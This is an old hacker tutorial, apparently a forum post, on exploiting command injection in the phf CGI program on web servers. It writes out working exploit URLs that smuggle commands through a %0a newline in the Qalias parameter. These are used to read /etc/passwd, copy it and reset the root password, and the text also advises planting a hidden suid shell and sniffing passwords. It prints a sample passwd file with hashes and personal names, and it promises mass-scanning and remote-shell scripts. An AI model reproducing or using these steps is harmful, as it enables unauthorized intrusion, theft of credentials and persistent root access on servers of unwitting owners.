PHF WWW PH Query

There is a program in the WWW cgi-bin directory called phf, if the file
is there, and has permission x, you can access it by using the www, or
a text version browser in linux called lynx. Now you can read files on the
system (yup .. /etc/passwd) and save them to files local in your computer.

There are many things we can get done here. If the server is running their
httpd server as root owner, we can be root by using phf and even change an
account password on the machine.

I will include a perl script here that will auto check all of the systems out
there by using the getdomain.pl script above and check what the server is
running under. If it is running under root, it will just log the id, if the
server is not running under root, it will auto get the passwd file from the
/etc directory and name it domainname.???.passwd.

I will also attach a script that will allow you to use a simple command from
a shell and if phf is on the system allow you to pipe commands from the shell
to the remote system with one command line.

Ok now that you know what is coming, lets teach you how to use phf.

Use your favorite web browser, or the text version in unix called most of
the time lynx, on some systems www.

After the screen comes up type the letter g, now a line appears like below:

URL to open:
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list

You type:

URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0aid
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list

It returns:

QUERY RESULTS



/usr/local/bin/ph -m alias=x id

uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)


So here we see it is running under a user (nobody), so we can be a user named
nobody on this system. We are not root, but this will have to do ;)

Notice the command line:

http://afp.org/cgi-bin/phf/?Qalias=x%0aid

The id was the command to the server to give us the id of the user. Some times
you will have to give the full path to the file you want to run, in this case
it would have been: http://afp.org/cgi-bin/phf/?Qalias=x%0a/usr/bin/id

Notice that after the %0a you start your command line. If you need to enter
a space you would put a %20 instead of the space. Here would be some sample
command lines. I will start them with %0a

Cat the passwd file
%0a/bin/cat%20/etc/passwd

Get a long directory of the /etc directory of all files starting with pass
%0als%20-al%20/etc/pass*

backup the passwd file if you have root access to httpd to passwd.my
%0acp%20/etc/passwd%20/etc/passwd.my

Change the root passwd (if the server will let you (most times it works)
%0apasswd%20root

(the above should let you login without a password, make sure to copy the
passwd.my file over the passwd file right away, and then delete the backup,
then make yourself an suid bash shell somewhere and rename it, sniff to get
your passwords)

If you know how to type commands in unix and don't forget that you need to
use %20 in the place of spaces, you will not have any problems!

Ok lets cat the passwd file on this box ;)

URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd

We get:


QUERY RESULTS



/usr/local/bin/ph -m alias=x cat /etc/passwd

root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash

A small passwd file rin

If you want to save this to a file in your local directory, just choose the
print option in the text browser and you will get an option to save the file
in your home directory.

Lets learn something here:

mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
1 :2 :3 :4 :5 :6 :7

1=username 2=encrypted password 3=user number 4=groop id 5=real name
6=home directory 7=shell

Ok, lets say you do not want to keep using the WWW browser, here is a script
you can compile to just type regular commands from your shell. (in next post)